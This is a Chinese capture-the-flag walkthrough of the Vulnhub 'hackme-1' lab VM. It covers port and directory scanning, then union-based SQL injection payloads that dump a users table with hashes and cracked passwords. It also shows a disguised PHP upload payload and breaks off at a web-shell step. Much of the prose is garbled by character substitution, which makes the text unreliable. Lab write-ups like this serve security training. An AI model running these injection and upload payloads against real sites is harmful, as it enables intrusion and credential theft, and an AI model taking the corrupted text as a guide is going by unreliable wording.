|
<
靶机hackme-1的目录
0x01靶机形貌
靶机底子疑息:
链接https://www.vulnhub.com/entry/hackme-1,330/公布工夫18 Jul 2019做者x4bx54易度简朴靶机底子引见:
“hackme”是一个初教者易度等级框。目的是经由过程web破绽得到有限的权限会见,然后权限晋级为root。那个尝试室是为了模仿实践糊口状况而创立的。
“hackme”利用DHCP,而且正在mysqld大要自止封闭的状况下(十分稀有的状况),尝试强迫从头启念头器,然后机械该当能够一般事情。
取VMware比拟,VirtualBox的结果更好
0x02状况拆建
- 下载并导进靶机
翻开vmware–文件–翻开–hackme.ova
- 检察收集适配器
将靶机收集适配器改成NAT形式
- 启动靶机
面击 ▶靶机,开启胜利
0x03靶机浸透
1、 疑息搜集
- masscan --rate=100000 -p 0-65535 192.168.30.207
复造代码
- nmap -T4 -sV -O -p 22,80 192.168.30.207
复造代码
- dirb http://192.168.30.207 /usr/share/dirb/wordlists/big.txt
复造代码
(2)gobuster目录扫描
- gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.30.207 -t 30
复造代码
- whatweb http://192.168.30.207
复造代码
2、 破绽发掘
- 登录主页发明登录页里,并且借能够注册用户
- 注册用户admin 密码123456
- 登录admin用户
单击search能够停止检察到许多的书名
- 考证sql注进
由以上考证出此处存正在字符型(单引号)sql注进
- Windows OS' order by 3#
复造代码
- Windows OS' order by 4#
复造代码
能够看出那里字段数为3
- -1' union select 1,2,3#
复造代码
- -1' union select database(),2,3#
复造代码
- -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#
复造代码
- -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
复造代码
10.检察表中user,password
- -1' union select group_concat(user),group_concat(pasword),3 from users#
复造代码
- user1 5d41402abc4b2a76b9719d911017c592 hello
- user2 6269c4f71a55b24bad0f0267d9be5508 commando
- user3 0f359740bd1cda994f8b55330c86d845 p@ssw0rd
- test 05a671c66aefea124cc08b76ea6d30bb testtest
- superadmin 2386acb2cf356944177746fc92523983 Uncrackable
- test1 05a671c66aefea124cc08b76ea6d30bb testtest
- admin e10adc3949ba59abbe56e057f20f883e 123456
- 123456 e10adc3949ba59abbe56e057f20f883e 123456
复造代码
那里只截了三张图,其他的解稀也一样,前面两个用户(admin,123456)是我本人方才正在网页注册的
建造假图片头
- GIF89a<?php phpinfo(); ?>
复造代码
上传前先开启burp抓包
- 阻拦-修正后缀-send,我们能够从回包中看出文件已将上传至文件夹
- http://192.168.30.207/uploads/
- 会见途径
- http://192.168.30.207/uploads/phpinfo.php
复造代码
该上传面存正在文件上传破绽,而且假图片头取图片马都可以
3、 破绽操纵
反弹shell办法一:一句话木马,蚁剑毗连
[code]<span class="token delimiter important"> |
1、本网站属于个人的非赢利性网站,转载的文章遵循原作者的版权声明,如果原文没有版权声明,按照目前互联网开放的原则,我们将在不通知作者的情况下,转载文章;如果原文明确注明“禁止转载”,我们一定不会转载。如果我们转载的文章不符合作者的版权声明或者作者不想让我们转载您的文章的话,请您发送邮箱:Cdnjson@163.com提供相关证明,我们将积极配合您!
2、本网站转载文章仅为传播更多信息之目的,凡在本网站出现的信息,均仅供参考。本网站将尽力确保所提供信息的准确性及可靠性,但不保证信息的正确性和完整性,且不对因信息的不正确或遗漏导致的任何损失或损害承担责任。
3、任何透过本网站网页而链接及得到的资讯、产品及服务,本网站概不负责,亦不负任何法律责任。
4、本网站所刊发、转载的文章,其版权均归原作者所有,如其他媒体、网站或个人从本网下载使用,请在转载有关文章时务必尊重该文章的著作权,保留本网注明的“稿件来源”,并自负版权等法律责任。
|